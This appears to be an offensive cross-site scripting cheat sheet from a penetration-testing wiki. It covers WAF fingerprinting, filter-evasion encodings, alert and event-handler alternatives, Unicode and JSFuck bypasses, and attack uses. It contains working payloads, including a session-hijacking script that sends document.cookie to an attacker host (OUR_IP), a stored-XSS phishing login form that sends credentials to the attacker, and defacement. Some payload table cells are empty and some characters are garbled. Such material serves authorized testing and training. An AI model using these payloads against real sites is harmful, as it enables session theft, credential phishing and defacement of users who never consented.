Cross Site Scripting (XSS)
Introduction
Cross-Site Scripting (XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. XSS normally allows an attacker to masquerade as a victim user, carrying out any actions that the user is able to perform and accessing any of the user's data. Source: https://portswigger.net/web-security/cross-site-scripting
XSS Useful References
Awesome labs to train your XSS skills: https://xssy.uk/
XSS Tools
Basic XSS Payloads
Code | Description |
---|---|
| Basic XSS Payload |
| Basic XSS Payload |
| Basic XSS Payload |
| HTML-based XSS Payload |
| Load remote script |
| Send Cookie details to us |
XSS Filters & WAFs Evasion
Web Application Firewalls (WAFs) inspect requests, analyse payloads, and apply predefined rule sets to identify and block any malicious traffic.
WAFs can protect web applications by leveraging various techniques such as signature-based pattern matching, behaviour analysis, and anomaly detection.
This section focuses on different methods which could help you bypassing XSS filters, whether they are in place due to the web application's implementation or due to a Web Application Firewall. If you are not sure whether the web application is protected by a WAF, some basic fingerprinting checks you can perform are the following:
Use automated tools, such as
wafw00f
Check if there are cookie values set by the WAF Example:
F5 BIG-IP ASM
releases cookies starting withTS
Server
headers or any other uncommon headerSometimes, the HTTP body contains some hints about the WAF in place.
Many more infos and WAF fingerprinting techniques can be found here: https://github.com/0xInfection/Awesome-WAF
Extra Hints & Tricks
If
alert()
is filtered, a valid (and less filtered) alternative isconfirm()
You can close tags using
//
rather than>
Sometimes, you can access DOM Objects by just specifying their name. Instead of using
document.cookie
anddocument.domain
you can usecookie
anddomain
respectively.http(s)://
can be shortened to//
or/\\
or\\
.Quotes are not required as long as you are not using spaces. For example you can use
<img src=http://example.com
without specifying any quotes.If all HTML tags are filtered, you can sometimes use custom ones, for example:
<22>alert()</22>
Alternative Encodings
If your characters are being filtered, a good starting point is trying the following alternative encodings
Char | HTML | Numeric Decimal | JS UniCode | Num. Hexadecimal | CSS (ISO) | JS (Octal) | URL |
---|---|---|---|---|---|---|---|
" |
|
| \u0022 | u+0022 | \0022 | \42 | %22 |
# |
|
| \u0023 | u+0023 | \0023 | \43 | %23 |
$ |
|
| \u0024 | u+0024 | \0024 | \44 | %24 |
% |
|
| \u0025 | u+0025 | \0025 | \45 | %25 |
& |
|
| \u0026 | u+0026 | \0026 | \46 | %26 |
' |
|
| \u0027 | u+0027 | \0027 | \47 | %27 |
( |
|
| \u0028 | u+0028 | \0028 | \50 | %28 |
) |
|
| \u0029 | u+0029 | \0029 | \51 | %29 |
* |
|
| \u002a | u+002A | \002a | \52 | %2A |
+ |
|
| \u002b | u+002B | \002b | \53 | %2B |
, |
|
| \u002c | u+002C | \002c | \54 | %2C |
- |
|
| \u002d | u+002D | \002d | \55 | %2D |
. |
|
| \u002e | u+002E | \002e | \56 | %2E |
/ |
|
| \u002f | u+002F | \002f | \57 | %2F |
: |
|
| \u003a | u+003A | \003a | \72 | %3A |
; |
|
| \u003b | u+003B | \003b | \73 | %3B |
< |
|
| \u003c | u+003C | \003c | \74 | %3C |
= |
|
| \u003d | u+003D | \003d | \75 | %3D |
> |
|
| \u003e | u+003E | \003e | \76 | %3E |
? |
|
| \u003f | u+003F | \003f | \77 | %3F |
@ |
|
| \u0040 | u+0040 | \0040 | \100 | %40 |
[ |
|
| \u005b | u+005B | \005b | \133 | %5B |
\ |
|
| \u005c | u+005C | \005c | \134 | %5C |
] |
|
| \u005d | u+005D | \005d | \135 | %5D |
^ |
|
| \u005e | u+005E | \005e | \136 | %5E |
_ |
|
| \u005f | u+005F | \005f | \137 | %5F |
` |
|
| \u0060 | u+0060 | \0060 | \u0060 | %60 |
{ |
|
| \u007b | u+007b | \007b | \173 | %7b |
| |
|
| \u007c | u+007c | \007c | \174 | %7c |
} |
|
| \u007d | u+007d | \007d | \175 | %7d |
Basic Bypasses
Whenever facing filters or blacklists on your special characters or javascript payloads, try using the following basic bypasses and alternative representations.
Alert alternatives
If alert('xss')
or alert(1)
are filtered, try using:
prompt('xss')
orprompt(1)
confirm('xss')
orconfirm(1)
alert(/xss/.source)
windows/alert/.source
OnError alternatives
If onerror=alert(1)
is filtered, try using:
onload=alert(1)
onfocus=alert(1)
combined withautofocus=true
setTimeout(alert(1))
setInterval(alert(1))
Function(alert(1))()
setImmediate(alert(1))
[notice that this only works on IE 10+]
Img tag alternatives
If an img payload such as <img src=x onerror=alert(1)>
is filtered, try using:
<svg/onload=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
Using Base64 encoded payloads
You can bypass many blacklist-based filters by using Base64-encoded payloads.
Generally speaking, you can generate the Base64-encoding of any payload and use it inside the atob
JavaScript function. In particular, just use
atob("<BASE64-PAYLOAD-ENCODING>")
You could also use other base64 encoded payloads such as the following alternative to javascript:alert('XSS')
: data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
Using JavaScript Unicode Characters
Some filters can be bypassed by using the JavaScript Unicode escape sequences to represent any blacklisted word or character.
For example, if alert
is blacklisted, you can use \u0061lert
, where \u0061
is the Unicode escape sequence for the lowercase letter a
.
A valid payload to bypass the previous blacklist example is: <script>\u0061lert(document.cookie)</script>
To represent the character โaโ using a Unicode escape sequence, you would use \u0061 because the Unicode code point for 'A' is 0x61 in hexadecimal.
You can use the following JavaScript code in your browserโs console to quickly gain the unicode values you need
Unicode Normalization
Unicode normalization is a process that ensures different binary representations of characters are standardized to the same binary value. This process is crucial in dealing with strings in programming and data processing
Depending on how the back-end/front-end is behaving when it receives weird unicode characters an attacker might be able to bypass protections and inject arbitrary characters. Indeed, sometimes, unicode normalization even allows bypassing WAFs in place.
You can find find a great article about this topic here: https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/
Two lists of unicode normalized characters can be found at:
I made a tool to help converting characters to their corresponding unicode normalized value, which I suggest to anyone. You can find my helper tool to perform Unicode Normalization here: https://github.com/alessio-romano/UniXSS
If you prefer, you can also find a list of copy-paste unicode normalized characters below:
Character | Unicode Normalization |
---|---|
< | %EF%BC%9C |
> | %EF%BC%9E |
โฎ | %e2%89%ae ≮ |
๏นค | %ef%b9%a4 ﹤ |
๏ผ | %ef%bc%9c < |
โฏ | %e2%89%af ≯ |
๏นฅ | %ef%b9%a5 ﹥ |
๏ผ | %ef%bc%9e > |
' | %ef%bc%87 |
" | %ef%bc%82 |
= | %e2%81%bc |
/ | %ef%bc%8f |
Bypass Using JSFuck
JSFuck is an esoteric JavaScript programming language that only uses the following 6 characters to write any JavaScript code: []()!+
The (very) basic idea behind JSFuck is that you can recreate all JavaScript functionalities using such a limited set of characters because JavaScript is a weakly typed programming language, meaning that it allows the evaluation of any expression as any type. If you want to know more about its inner workings, check out this link.
The following represents an alert(1)
payload written in JSFuck
Link: https://jsfuck.com/ GitHub Repo: https://github.com/aemkei/jsfuck
XSS Attacks
XSS attacks are not just about popping the alert message containing cookies.
This section describes some alternative attacks you can perform by exploiting XSS vulnerabilities
Open Redirect to XSS
Whenever you are facing a web application which is vulnerable to Open Redirects, it might also be the case that the same vector can be used to gain XSS.
An example might be a website which allows for open redirects by leveraging a GET parameter, such as the following: vulnerable.com/test.php?redirect_url={value}
Instead of using the standard http or https protocols followed by your attacker website, you might insert a javascript
payload as the value
of the redirect_url
parameter.
For example, you could navigate to the following URL to pop an alert:
vulnerable.com/test.php?redirect_url=javascript:alert(document.domain)
XSS Session Hijacking
Use the following XSS Payload:
<script src=http://OUR_IP/script.js></script>
On the attacker machine, write one of the following payload inside a file named
script.js
:new Image().src='http://OUR_IP/index.php?c='+document.cookie
document.location='http://OUR_IP/index.php?c='+document.cookie;
XSS Phishing
A common form of XSS phishing is obtained with stored XSS
The attacker can inject a fake login form that sends the credentials to an attacker's server,
To perform a Stored XSS phishing attack, we must inject an HTML code that displays a login form on the targeted page.
An example of such login form is the following (Note: Change
OUR_IP
in the payload)
XSS Defacing
Defacing means changing the website's appearance for anyone who visits the website
The website's appearance can be changed using injected Javascript code
Note: This requires a stored XSS Vulnerability
Defacing Payload | Description |
---|---|
| Change website background color |
| Change website background image |
| Change website title |
| Change HTML element/DOM text using innerHTML |
Last updated